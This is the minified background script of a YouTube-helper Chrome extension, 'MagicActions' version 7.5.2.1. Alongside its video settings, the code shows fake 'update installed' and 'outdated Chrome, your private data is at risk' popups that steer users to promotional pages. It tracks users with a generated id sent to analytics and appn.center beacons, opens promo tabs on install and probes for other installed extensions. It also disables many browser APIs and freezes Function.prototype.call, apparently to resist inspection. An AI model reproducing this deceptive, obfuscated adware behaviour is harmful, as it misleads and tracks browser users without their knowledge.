// MagicActions for Google Chrome - CHROMEACTIONS.COM - Copyright (c) 2018 Vlad & Serge Strukoff. All Rights Reserved.
(function(){function N(a){var c;if((c=Ja.call(I,f))&&0<c.length){c=c[0];var d=f[c];delete f[c];f[c]=d}c=W.call(w,f);J="document.vvdds='"+c+"'";try{la.call(X,"opt",Ka(c))}catch(e){a||n.call(b,function(){N(!0)},2E3)}}function ma(a){Y.call(h,{windowType:"normal",url:"*://*.youtube.com/*",status:"complete"},function(c){for(var b=0,e=c.length;b<e;b++)na.call(h,c[b].id,{code:a})})}function La(a){oa=a;Y.call(h,{url:"https://www.mycinema.pro/take-snapshots-of-your-favorite-videos.html"},function(c){c&&c.length?
Z.call(h,c[0].id,{active:!0},function(){Ma.call(h,c[0].id,a)}):F.call(h,{url:"https://www.mycinema.pro/take-snapshots-of-your-favorite-videos.html",active:!0})});n.call(b,r,3003)}function pa(a){var c,b="https://www.hotcleaner.com/clickclean/install-magic.html#mhvhfcb https://chrome.google.com/webstore/detail/magic-actions-for-youtube/abjcfabbhafbcdfjoecdgepllmpfceif/reviews https://www.youtube.com/channel/UCCwIAJrwWGB2GCyZSp41wNg?sub_confirmation=1 https://www.facebook.com/magicactions/ https://plus.google.com/110367533603365326399 https://www.youtube.com/watch?list=PLFgquLnL59alCl_2TQvOiD5Vgm1hCaGSI".split(" "),
e=["XjdrKY.html","NOTIFY_HTML_ID.html","tnWKnHj.html"],k="options menu cinema support themes volume-control autohd comments contribute 100-top-music-videos news browser-update-checker latest-news".split(" ");99==a?c="https://www.mycinema.pro/":99<a&&106>a?c=b[a-100]:199<a&&210>a?c=aa+e[a-200]:299<a&&313>a&&(c="https://www.mycinema.pro/"+k[a-300]+".html");return c}function t(a,c,b,e){var d={p:a,h:b?!1:!0},qa=pa(d.p)||"https://www.mycinema.pro/";if(c){d.f=c;var m=pa(c)}void 0!==e&&(d.w=e);
m?Na(function(a){a?(d.a=1,d.u=qa):(d.a=0,d.u=m);ra(d)}):(d.a=2,d.u=qa,ra(d))}function ra(a){var c={url:a.u};void 0!==a.w&&(c.windowId=a.w);Y.call(h,c,function(c){c&&c.length?Z.call(h,c[0].id,{active:!0},function(a){Oa.call(O,a.windowId,{focused:!0})}):(c={url:a.u,active:a.h},void 0!==a.w&&(c.windowId=a.w),F.call(h,c,function(c){a.t=c.id;n.call(b,Pa,2E3,a)}))})}function Pa(a){try{Qa.call(h,a.t,function(c){c=c&&c.url||null;c==a.u?B("200 "+G.call(b,a.u)):null==c?B("202 "+G.call(b,a.u)):B("201 "+G.call(b,
a.u+"?e="+c))})}catch(c){B("203 "+G.call(b,a.u))}}function sa(a){Ra.call(u);K.call(u,{id:"7841",title:"¤ Contribute …",contexts:["browser_action"]});K.call(u,{id:"7842",title:"♥ Rate Me …",contexts:["browser_action"]});K.call(u,{id:"7843",title:"♫ What's New …",contexts:["browser_action"]});K.call(u,{id:"7844",title:"► Subscribe …",contexts:["browser_action"]});a&&K.call(u,{id:"7840",title:"Search YouTube for %s",contexts:["selection"]})}function r(){P("GET","https://clients2.google.com/service/update2/crx?x=id%3Dabjcfabbhafbcdfjoecdgepllmpfceif%26v%3D7.5.2.1%26uc&_="+
Sa.call(ta),null,0,function(a){})}function Na(a){P("HEAD","https://www.mycinema.pro/",0,"text",function(c){!c||200!=c.code&&304!=c.code?a():a(1)})}function B(a){a=a||"unk";f.uid||(f.uid=ua());va.call(ba,"https://www.google-analytics.com/collect","v=1&tid=UA-326771-6&cid="+f.uid+"&t=event&ec=app&ea="+a+"&el=MA 7.5.2.1")}function P(a,c,b,e,k){var d={code:0},m=new wa;Ta.call(m,a,c,!0);e&&(m.responseType=e);m.onload=function(a){d.code=this.status||0;d.data=this.response;k(d)};m.onerror=function(){k(d)};
m.onabort=function(){k(d)};try{Ua.call(m,b)}catch(ub){k(d)}}function ua(){var a=y.call(4294967296*C.call(p)>>>0,16),c=y.call((4294967296*C.call(p)&4294922239|16384)>>>0,16),b=y.call((4294967296*C.call(p)&3221225471|2147483648)>>>0,16),e=y.call(4294967296*C.call(p)>>>0,16);8>a.length&&(a=v.call("0000000"+a,-8));8>c.length&&(c=v.call("0000000"+c,-8));8>b.length&&(b=v.call("0000000"+b,-8));8>e.length&&(e=v.call("0000000"+e,-8));return Va.call([a,v.call(c,0,4),v.call(c,4),v.call(b,0,4),v.call(b,4)+e],
"-")}function Ka(a){for(var c="",b=[3,0,0,-3],e,k=0,f=a.length;k<f;k++)e=b[k%4],c=k+e<f?c+y.call(xa.call(a,k+e),16):c+y.call(xa.call(a,k),16);return c}function Wa(a){a=ca.call(a,/.{1,2}/g);for(var c=[3,0,0,-3],d,e="",k=0,f=a.length;k<f;k++)d=c[k%4],e=k+d<f?e+ya.call(Q,R.call(b,a[k+d],16)):e+ya.call(Q,R.call(b,a[k],16));return e}function Xa(a){var c=aa+"Fjtq/",b,e;P("GET",c+"sans.txt",null,"text",function(d){b=d.data;P("GET",c+"warn.txt",null,"text",function(d){e=d.data;var f=D(1,2);d=D(16,28);
f="image/"+(1==f?"webp":"png");var k=.8*C.call(p)+.2;Ya(c+"24.png",d,d,f,k,function(c){a(c,b,e)})})})}function T(a,c){Xa(function(d,e,k){k=f.uid||ua();var g;var m=D(1,3);if(1==a){1==m?g=" New Version …":2==m?g=" Update Completed!":3==m&&(g=" Installed Successfully!");var l="news-ok-btn";var S="https://www.mycinema.pro/1-app-for-youtube.html";var n="An updated version of Magic Actions has been installed successfully. Did you know:";var q="#1 App for YouTube …";var r='Installed version: <span id="ct">'+
c+"</span>";var p="#fffeef";var t="#000004";var u="#f44329";var v="#fffefe";var w="#0074ec";var x="#005eec";var A="#FF7E50";var B="#002020";var y=D(377,405)}else 2==a&&(1==m?g="Please Attention!":2==m?g=" Warning!":3==m&&(g="Old Chrome Version!"),l="oldbr-ok-btn",S="https://www.mycinema.pro/browser-update-checker.html",n="You are using an outdated version of Chrome. This could put your private data at risk!",q="Scan for a new version",r='You have version: <span id="ct">'+c+"</span>",p="#fff8d5",t=
"#212122",u="#4275f5",v="#ffffef",w="#0164ec",x="#017dfc",A="#FF7F50",B="#010020",y=D(378,406));m=D(188,193);var C=b.screen.height-m-D(51,231);var E=b.screen.width-y-D(17,109);var z=ca.call(L,/YaBrowser|Vivaldi|Comodo|Dragon|Iron|Torch|Vivaldi|Slimjet|Sleipnir|Iridium|Kinza|Lovense|Maxthon|Electron|MxNitro|Perk|QQBrowser|Nichrome|Salam|Secure|Seznam|SznPro|UBrowser|WebExplorer|Whale|Xvast|OPR|Brave|AviraScout|CoRom|coc_coc|Spark|Edge|Firefox|Trident/)?!0:!1;d="data:text/html;charset=utf-8,"+G.call(b,
'<!DOCTYPE html><html> <head> <meta charset="UTF-8">  <script type="text/javascript">'+('(function(n,a,c){var b=EventTarget.prototype,e=Event.prototype,f=Navigator.prototype.sendBeacon,g=Document.prototype.querySelector,d=b.addEventListener,p=e.stopPropagation,h=e.stopImmediatePropagation,q=a.open,k=a.close,l=a.setTimeout,m=32E4;delete b.addEventListener;delete a.close;d.call(a,"DOMContentLoaded",function(){function b(b){m+=6771;f&&f.call(n,"https://www.google-analytics.com/collect","v=1&el=MA 7.5.2.1&cid='+
k+'&tid=UA-"+m+"-6&t=event&ec=app&ea='+l+'");p.call(b);h&&h.call(b);'+z+'?a.location.href="'+S+'":(q.call(a,"'+S+'"),k.call(a))}d.call(g.call(c,"#bQt"),"click",b,!0);d.call(g.call(c,"#cnt"),"click",b,!0);l.call(a,function(){k.call(a)},378E5);l(function(){c.title="'+g+'"},3E3)},!0)})(navigator,window,document);')+"\x3c/script><title>"+g+'</title><link rel="icon" href="'+d+'"><link rel="preconnect" href="'+S+'"><style type="text/css">@font-face{font-family:"oans";font-weight:400;font-style:normal;src:url('+
e+') format("woff")} html,body,div,button{margin:0;padding:0;outline:0;border:0}html{background:'+p+"}body{width:100%;height:100%;overflow:hidden"+(z?";zoom:1.3;padding-top:2em":"")+'}div,button{font-family:"oans",Segoe UI,Helvetica,Arial,sans-serif;font-size:14px}div#box{padding:10px 9px 14px 9px;line-height:23px;color:'+t+";background:"+p+"}div#hdr{padding-left:43px;max-width:345px;margin:0 auto;user-select:none;background-position:0 5px;background-repeat:no-repeat;background-image:url("+e+")}button#bQt{transition:background-color .5s;display:block;line-height:16px;padding:10px 14px;border-radius:2px;margin:14px auto 0;text-decoration:none;font-size:14px;font-weight:500;background-color:"+
u+";color:"+v+";text-transform:uppercase;border-radius:3px;cursor:pointer} button#bQt:focus{background-color:"+x+";outline:solid 2px "+A+"}button#bQt:hover{background-color:"+w+"}button#cnt{display:block;background:"+p+";margin:10px auto 0;line-height:23px;text-align:center;font-weight:600;color:"+B+';cursor:pointer}button#cnt:hover{text-decoration:underline}</style></head><body><div id="box"><div id="hdr">'+n+'</div><button id="bQt" autofocus>'+q+'</button><button id="cnt">'+r+"</button></div></body></html>");
z?F.call(h,{url:d,active:!1}):Za.call(O,{type:"popup",url:d,top:C,left:E,width:y,height:m})})}function Ya(a,c,b,e,f,g){var d=new $a;ab.call(d,"load",function(){var a=bb.call(cb,"canvas"),k=db.call(a,"2d");a.width=c;a.height=b;eb.call(k,0,0,c,b);fb.call(k,d,0,0,c,b);g(gb.call(a,e,f))},!0);d.src=a}function hb(a){if(ca.call(L,/CrOS|Mobile|Linux|YaBrowser|Vivaldi|Comodo|Dragon|Iron|Torch|Vivaldi|Slimjet|Sleipnir|Chromium|Iridium|Kinza|Lovense|Maxthon|Electron|MxNitro|Perk|QQBrowser|Nichrome|Salam|Secure|Seznam|SznPro|UBrowser|WebExplorer|Whale|Xvast|OPR|Brave|AviraScout|CoRom|coc_coc|Spark|Edge|Firefox|Trident/))a&&
T(1,"7.5.2.1");else{var c=za.call(L,"Chrome/");if(0<c){c+=7;var d=za.call(L," ",c);if(d>c){c=v.call(L,c,d);d=0;for(var e=Aa.call(c,"."),f=Aa.call("69.0.3497.100","."),g=ib.call(p,e.length,f.length),m,h,l=0;l<g;l++)if(m=l<e.length?R.call(b,e[l],10):0,h=l<f.length?R.call(b,f[l],10):0,Ba.call(b,m)&&(m=0),Ba.call(b,h)&&(h=0),m!=h){d=m>h?1:-1;break}0>d?T(2,c):a&&T(1,"7.5.2.1")}}else a&&T(1,"7.5.2.1")}}function jb(a,b){function c(a,d,f){a==e&&"complete"==f.status&&(kb.call(Ca,c),lb.call(h,e),b("favIconUrl"in
f))}var e;32==a.length&&F.call(h,{url:"chrome-extension://"+a+"/manifest.json",active:!1,pinned:!0},function(a){e=a.id;E.call(Ca,c)})}function D(a,b){return mb.call(p,C.call(p)*(b+1-a))+a}var b=self.window,cb=b.document,X=b.localStorage,ba=b.navigator,wa=b.XMLHttpRequest,p=b.Math,ta=b.Date,Q=b.String,w=b.JSON,$a=b.Image,I=b.Object,L=ba.userAgent,q=b.chrome||b.browser,z=q.runtime,h=q.tabs,O=q.windows,u=q.contextMenus,nb=z.getURL,ob=z.setUninstallURL,da=z.onMessage,pb=z.onStartup,qb=z.onInstalled,E=
da.addListener,kb=da.removeListener,Y=h.query,na=h.executeScript,F=h.create,lb=h.remove,Z=h.update,Ma=h.sendMessage,Qa=h.get,Ca=h.onUpdated,Oa=O.update,Za=O.create,rb=q.browserAction.onClicked,Ra=u.removeAll,K=u.create,sb=u.onClicked,M=Q.prototype,H=Storage.prototype,ea=Navigator.prototype,fa=wa.prototype,Da=DocumentFragment.prototype,l=Document.prototype,Ea=DOMImplementation.prototype,ha=EventTarget.prototype,ia=Event.prototype,A=Node.prototype,g=Element.prototype,U=HTMLElement.prototype,Fa=HTMLCanvasElement.prototype,
Ga=CanvasRenderingContext2D.prototype,tb=H.getItem,la=H.setItem,va=ea.sendBeacon,Ta=fa.open,Ua=fa.send,y=Number.prototype.toString,xa=M.charCodeAt,v=M.slice,Aa=M.split,za=M.indexOf,ca=M.match,Va=Array.prototype.join,bb=l.createElement,ab=ha.addEventListener,gb=Fa.toDataURL,db=Fa.getContext,fb=Ga.drawImage,eb=Ga.clearRect,W=w.stringify,ja=w.parse,ya=Q.fromCharCode,R=b.parseInt,Ba=b.isNaN,n=b.setTimeout,Sa=ta.now,G=b.encodeURIComponent,C=p.random,mb=p.floor,ib=p.max,Ja=I.getOwnPropertyNames;try{var V=
I.getOwnPropertyDescriptor(Function.prototype,"call");V&&(V.configurable=!1,V.writable=!1,I.defineProperty(Function.prototype,"call",V))}catch(a){}H.getItem=H.setItem=H.removeItem=H.clear=ea.sendBeacon=fa.open=Da.querySelector=Da.querySelectorAll=l.createDocumentFragment=l.createTextNode=l.createElement=l.createElementNS=l.evaluate=l.createEvent=l.createCDATASection=l.execCommand=l.querySelector=l.querySelectorAll=l.open=l.write=l.writeln=Ea.createHTMLDocument=Ea.createDocument=ha.addEventListener=
ha.removeEventListener=ia.preventDefault=ia.stopPropagation=ia.stopImmediatePropagation=A.appendChild=A.cloneNode=A.getRootNode=A.removeChild=A.replaceChild=A.insertBefore=g.attachShadow=g.createShadowRoot=g.getElementsByClassName=g.getElementsByTagName=g.getElementsByTagNameNS=g.append=g.remove=g.before=g.after=g.prepend=g.querySelector=g.querySelectorAll=g.requestPointerLock=g.setAttribute=g.removeAttribute=g.removeAttributeNS=g.removeAttributeNode=g.replaceWith=g.insertAdjacentElement=g.insertAdjacentText=
g.insertAdjacentHTML=U.focus=U.click=function(){};delete b.AnimationWorklet;delete b.AudioContext;delete b.Blob;delete b.CSS;delete b.CustomElementRegistry;delete b.CustomEvent;delete b.DOMImplementation;delete b.DOMParser;delete b.Event;delete b.FormData;delete b.Image;delete b.JSON;delete b.LayoutWorklet;delete b.MutationObserver;delete b.Navigator;delete b.PaintWorklet;delete b.Proxy;delete b.Range;delete b.Request;delete b.Response;delete b.ServiceWorker;delete b.SharedWorker;delete b.Storage;
delete b.URL;delete b.WebAssembly;delete b.WebSocket;delete b.Worker;delete b.XMLHttpRequest;delete b.XMLHttpRequestUpload;delete b.XMLSerializer;delete b.XSLTProcessor;delete b.fetch;delete b.close;delete b.open;delete b.alert;delete b.confirm;delete b.eval;delete b.localStorage;delete b.postMessage;delete b.prompt;delete b.stop;delete b.customElements;delete b.navigator;delete A.textContent;delete l.cookie;delete l.body;delete ea.serviceWorker;delete g.innerHTML;delete g.outerHTML;delete U.innerText;
delete U.outerText;delete q.Event;for(var ka in q)if("runtime"==ka)for(var Ha in q.runtime)"function"===typeof q.runtime[Ha]&&(q.runtime[Ha]=function(){});else if("object"===typeof q[ka])try{I.defineProperty(q,ka,{configurable:!1,enumerable:!1,writable:!1,value:{}})}catch(a){}var aa=nb.call(z,""),x={ver:"7.5.2.1",extURL:"",uid:"",mwvc:!0,color:"white",mwvcm:!0,mwvct:!1,mwvcr:!1,mwvci:1,gap:5,hq:!0,hqi:"large",pause:!1,plist:!1,buf:!1,buf1:!1,loop:!1,anns:!0,cin:!0,cina:!1,cini:2,cinf:!1,cinc:0,cint:1,
cinl:!1,ww:!1,wide:!1,h0:!1,h1:!1,h2:!1,h3:!1,h4:!1,h5:!1,h6:!1,h7:!1,h8:!1,a0:!0,a1:!1,a2:!1,a3:!0,a4:!0,a5:!0,ui:1,c0:!1,c1:!1,c2:!1,c3:!1,c4:!1,f0:!0,mrl:!0},oa,f,J,Ia=0;try{ob("https://www.mycinema.pro/support.html#mhuhfcb"),E.call(pb,function(){})}catch(a){}(function(){a:{var a=tb.call(X,"opt");a="string"===typeof a?a:void 0;if(void 0!==a){if("{"==a.charAt(0))try{a=ja.call(w,a)}catch(e){f=void 0;break a}else try{a=ja.call(w,Wa(a))}catch(e){a=void 0}f=a}else f=void 0}if(void 0===f){f=x;var b=
!0}else{for(var d in f)d in x?typeof f[d]!==typeof x[d]&&(f[d]=x[d],b=!0):(delete f[d],b=!0);for(d in x)d in f||(f[d]=x[d],b=!0)}f.ver="7.5.2.1";f.extURL=aa;J="document.vvdds='"+W.call(w,f)+"'";b&&N()})();E.call(da,function(a,c,d){if(37===a)return-1<c.tab.index&&na.call(h,c.tab.id,{code:J,runAt:"document_start"}),!1;if(0===a)return!1;try{a=ja.call(w,a)}catch(k){return!1}if(0==a.id)return n.call(b,r,3017),d({opt:f}),!0;if(2==a.id)"chrome://components/"==a.url||"chrome://settings/help"==a.url?F.call(h,
{url:a.url,active:!0}):202==a.url&&t(202,0);else if(3==a.id){a=a.opt;for(var e in a)e in x&&"ver"!==e&&(f[e]=a[e]);N();ma(J)}else if(4==a.id)e=a.name,c=a.ctx,e in x&&"ver"!==e&&(f[e]=a.value,N(),c&&sa(f.a0&&f.a3),ma(J));else{if(5==a.id)return d({value:f[a.name]}),!0;if(6==a.id)La(a);else if(7==a.id)t(a.p,a.f,a.a);else{if(9==a.id)return d(oa),!0;if(20==a.id)B(a.ea);else if(21==a.id)e=a.a,a=a.v,3>Ia&&(Ia++,va.call(ba,"https://appn.center/apiv1/ans",W.call(w,{ans:{ec:"app",el:"MA 7.5.2.1",v:a,ea:e}})));
else if(30==a.id)return jb(a.a,d),!0}}return!1});E.call(qb,function(a){var c=a&&a.reason||"";"install"===c?(n.call(b,function(){t(99,104)},1E3),n.call(b,function(){t(100,200)},3E3),B("installed"),r(),n.call(b,r,3012)):"update"===c&&"7.5.2.1"!==a.previousVersion&&(la.call(X,"sv",1),hb(1),r(),n.call(b,r,9E3));n.call(b,r,7303)});E.call(rb,function(){t(301,200);n.call(b,r,3003);n.call(b,r,6212)});n.call(b,r,11001);sa(f.a0&&f.a3);E.call(sb,function(a,c){var d=a.menuItemId;7841==d?t(202):7842==d?t(101):
7843==d?t(310,104):7844==d?t(102):7840==a.menuItemId&&(a="https://www.youtube.com/results?search_query="+G.call(b,a.selectionText),0==c.url.indexOf("https://www.youtube.com/")?Z.call(h,{url:a}):F.call(h,{url:a,selected:!0}))});n.call(b,r,8023)})();
